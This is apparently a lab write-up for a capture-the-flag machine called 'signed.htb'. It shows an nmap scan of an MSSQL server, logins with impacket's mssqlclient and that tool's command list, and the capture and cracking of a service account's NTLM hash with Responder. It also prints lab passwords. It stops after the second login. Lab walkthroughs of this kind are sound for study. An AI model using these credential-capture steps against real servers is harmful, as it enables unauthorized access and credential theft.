Difficulty: medium

#2025.11.11

Adding the IP to /etc/hosts:

sudo nano /etc/hosts

Network scan:

> nmap -Pn -sV -sC 10.10.11.90
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-11 17:15 +0800
Nmap scan report for dc01.signed.htb (10.10.11.90)
Host is up (0.28s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
|   10.10.11.90:1433:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info:
|   10.10.11.90:1433:
|     Target_Name: SIGNED
|     NetBIOS_Domain_Name: SIGNED
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: SIGNED.HTB
|     DNS_Computer_Name: DC01.SIGNED.HTB
|     DNS_Tree_Name: SIGNED.HTB
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-11-11T09:17:58+00:00; -5s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-10T10:03:58
|_Not valid after:  2055-11-10T10:03:58

Host script results:
|_clock-skew: mean: -2s, deviation: 4s, median: -5s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.23 seconds

Connecting with mssqlclient.py:

> mssqlclient.py scott:Sm230#C5NatH@10.10.11.90
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (scott  guest@master)> shell
SQL (scott  guest@master)> help

    lcd {path}                 - changes the current local directory to {path}
    exit                       - terminates the server process (and this session)
    enable_xp_cmdshell         - you know what it means
    disable_xp_cmdshell        - you know what it means
    enum_db                    - enum databases
    enum_links                 - enum linked servers
    enum_impersonate           - check logins that can be impersonated
    enum_logins                - enum login users
    enum_users                 - enum current db users
    enum_owner                 - enum db owner
    exec_as_user {user}        - impersonate with execute as user
    exec_as_login {login}      - impersonate with execute as login
    xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
    xp_dirtree {path}          - executes xp_dirtree on the path
    sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
    use_link {link}            - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
    ! {cmd}                    - executes a local shell cmd
    upload {from} {to}         - uploads file {from} to the SQLServer host {to}
    download {from} {to}       - downloads file from the SQLServer host {from} to {to}
    show_query                 - show query
    mask_query                 - mask query

With Responder set up I got the following hash:

> cat hash.txt
mssqlsvc::SIGNED:507e[hash truncated]

which I cracked.

Logging in again as mssqlsvc with the cracked password:

> mssqlclient.py SIGNED/mssqlsvc:'purPLE9795!@'@10.10.11.90 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  guest@master)>